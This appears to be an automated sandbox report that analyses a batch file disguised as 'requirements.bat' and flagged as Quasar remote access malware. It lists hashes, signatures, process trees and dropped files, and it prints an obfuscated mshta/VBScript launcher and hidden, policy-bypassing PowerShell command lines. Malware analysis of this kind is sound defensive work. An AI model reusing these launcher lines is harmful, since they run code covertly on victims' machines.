Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
29s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
29/03/2024, 00:06
Behavioral task
behavioral1
Sample
dhm/1st person.exe
Resource
win11-20240221-en
Behavioral task
behavioral2
Sample
kiracro-toggle.pyc
Resource
win11-20240221-en
Behavioral task
behavioral3
Sample
dhm/3rd person.exe
Resource
win11-20240221-en
Behavioral task
behavioral4
Sample
kiracro-toggle.pyc
Resource
win11-20240221-en
General
-
Target
dhm/requirements.bat
-
Size
15.5MB
-
MD5
60c6f3b002d9bc81aa993566ed1d4daf
-
SHA1
8b801703fe6e418cf59b50a46c21bf79b104ee8e
-
SHA256
a53d1740f3c14be4608db28590ef26264975d13d4cb7ff4fc823a3107798cf42
-
SHA512
9b2cb3ba41c21023453fff0a29b1dbd534ab87a6af1255fd5bd6e521bbacf617355dc17592f8b876e4d340494df1ef9efe268c6276d654f74ad2888e7d9df319
-
SSDEEP
49152:ttG1Kmdh/bGIPKdMdGB52bc0MIoW8mN+aNahOJDZQevDR+SEOzjm9d+SpUNKbkVq:P
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar payload 1 IoCs
resource yara_rule behavioral5/memory/3324-90-0x0000027BFC830000-0x0000027BFCFDE000-memory.dmp family_quasar -
Deletes itself 1 IoCs
pid Process 4228 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 4544 $sxr-mshta.exe 924 $sxr-cmd.exe 3324 $sxr-powershell.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\$sxr-cmd.exe powershell.exe File opened for modification C:\Windows\$sxr-cmd.exe powershell.exe File created C:\Windows\$sxr-powershell.exe powershell.exe File opened for modification C:\Windows\$sxr-powershell.exe powershell.exe File created C:\Windows\$sxr-mshta.exe powershell.exe File opened for modification C:\Windows\$sxr-mshta.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 4228 powershell.exe 4228 powershell.exe 4228 powershell.exe 4228 powershell.exe 4228 powershell.exe 4228 powershell.exe 3324 $sxr-powershell.exe 3324 $sxr-powershell.exe 3324 $sxr-powershell.exe 3324 $sxr-powershell.exe 3324 $sxr-powershell.exe 3324 $sxr-powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 3324 $sxr-powershell.exe Token: SeDebugPrivilege 3324 $sxr-powershell.exe Token: SeDebugPrivilege 3324 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 396 wrote to memory of 1472 396 cmd.exe 79 PID 396 wrote to memory of 1472 396 cmd.exe 79 PID 396 wrote to memory of 4228 396 cmd.exe 80 PID 396 wrote to memory of 4228 396 cmd.exe 80 PID 4544 wrote to memory of 924 4544 $sxr-mshta.exe 83 PID 4544 wrote to memory of 924 4544 $sxr-mshta.exe 83 PID 924 wrote to memory of 1968 924 $sxr-cmd.exe 85 PID 924 wrote to memory of 1968 924 $sxr-cmd.exe 85 PID 924 wrote to memory of 3324 924 $sxr-cmd.exe 86 PID 924 wrote to memory of 3324 924 $sxr-cmd.exe 86 PID 3324 wrote to memory of 680 3324 $sxr-powershell.exe 7 PID 3324 wrote to memory of 680 3324 $sxr-powershell.exe 7 PID 3324 wrote to memory of 988 3324 $sxr-powershell.exe 12 PID 3324 wrote to memory of 988 3324 $sxr-powershell.exe 12 PID 3324 wrote to memory of 452 3324 $sxr-powershell.exe 14 PID 3324 wrote to memory of 452 3324 $sxr-powershell.exe 14 PID 3324 wrote to memory of 704 3324 $sxr-powershell.exe 15 PID 3324 wrote to memory of 704 3324 $sxr-powershell.exe 15 PID 3324 wrote to memory of 1044 3324 $sxr-powershell.exe 16 PID 3324 wrote to memory of 1044 3324 $sxr-powershell.exe 16 PID 3324 wrote to memory of 1080 3324 $sxr-powershell.exe 17 PID 3324 wrote to memory of 1080 3324 $sxr-powershell.exe 17 PID 3324 wrote to memory of 1196 3324 $sxr-powershell.exe 19 PID 3324 wrote to memory of 1196 3324 $sxr-powershell.exe 19 PID 3324 wrote to memory of 1216 3324 $sxr-powershell.exe 20 PID 3324 wrote to memory of 1216 3324 $sxr-powershell.exe 20 PID 3324 wrote to memory of 1284 3324 $sxr-powershell.exe 21 PID 3324 wrote to memory of 1284 3324 $sxr-powershell.exe 21 PID 3324 wrote to memory of 1304 3324 $sxr-powershell.exe 22 PID 3324 wrote to memory of 1304 3324 $sxr-powershell.exe 22 PID 3324 wrote to memory of 1364 3324 $sxr-powershell.exe 23 PID 3324 wrote to memory of 1364 3324 $sxr-powershell.exe 23 PID 3324 wrote to memory of 1464 3324 $sxr-powershell.exe 24 PID 3324 wrote to memory of 1464 3324 $sxr-powershell.exe 24 PID 3324 wrote to memory of 1532 3324 $sxr-powershell.exe 25 PID 3324 wrote to memory of 1532 3324 $sxr-powershell.exe 25 PID 3324 wrote to memory of 1624 3324 $sxr-powershell.exe 26 PID 3324 wrote to memory of 1624 3324 $sxr-powershell.exe 26 PID 3324 wrote to memory of 1632 3324 $sxr-powershell.exe 27 PID 3324 wrote to memory of 1632 3324 $sxr-powershell.exe 27 PID 3324 wrote to memory of 1660 3324 $sxr-powershell.exe 28 PID 3324 wrote to memory of 1660 3324 $sxr-powershell.exe 28 PID 3324 wrote to memory of 1732 3324 $sxr-powershell.exe 29 PID 3324 wrote to memory of 1732 3324 $sxr-powershell.exe 29 PID 3324 wrote to memory of 1784 3324 $sxr-powershell.exe 30 PID 3324 wrote to memory of 1784 3324 $sxr-powershell.exe 30 PID 3324 wrote to memory of 1844 3324 $sxr-powershell.exe 31 PID 3324 wrote to memory of 1844 3324 $sxr-powershell.exe 31 PID 3324 wrote to memory of 1880 3324 $sxr-powershell.exe 32 PID 3324 wrote to memory of 1880 3324 $sxr-powershell.exe 32 PID 3324 wrote to memory of 1940 3324 $sxr-powershell.exe 33 PID 3324 wrote to memory of 1940 3324 $sxr-powershell.exe 33 PID 3324 wrote to memory of 1948 3324 $sxr-powershell.exe 34 PID 3324 wrote to memory of 1948 3324 $sxr-powershell.exe 34 PID 3324 wrote to memory of 2040 3324 $sxr-powershell.exe 35 PID 3324 wrote to memory of 2040 3324 $sxr-powershell.exe 35 PID 3324 wrote to memory of 1152 3324 $sxr-powershell.exe 36 PID 3324 wrote to memory of 1152 3324 $sxr-powershell.exe 36 PID 3324 wrote to memory of 2088 3324 $sxr-powershell.exe 37 PID 3324 wrote to memory of 2088 3324 $sxr-powershell.exe 37 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:452
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1196
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bsdNZbmfOhwdBQEAEjRQ4312:GWhOVoSS=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-bsdNZbmfOhwdBQEAEjRQ4312:GWhOVoSS=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:lzNxgZnUMx; "4⤵PID:1968
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3324
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1464
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1624
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1880
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1948
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1152
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2088
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dhm\requirements.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:qRLHzJZDJQ; "2⤵PID:1472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden2⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
324KB
MD5c5db7b712f280c3ae4f731ad7d5ea171
SHA1e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89
-
Filesize
32KB
MD5356e04e106f6987a19938df67dea0b76
SHA1f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA2564ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d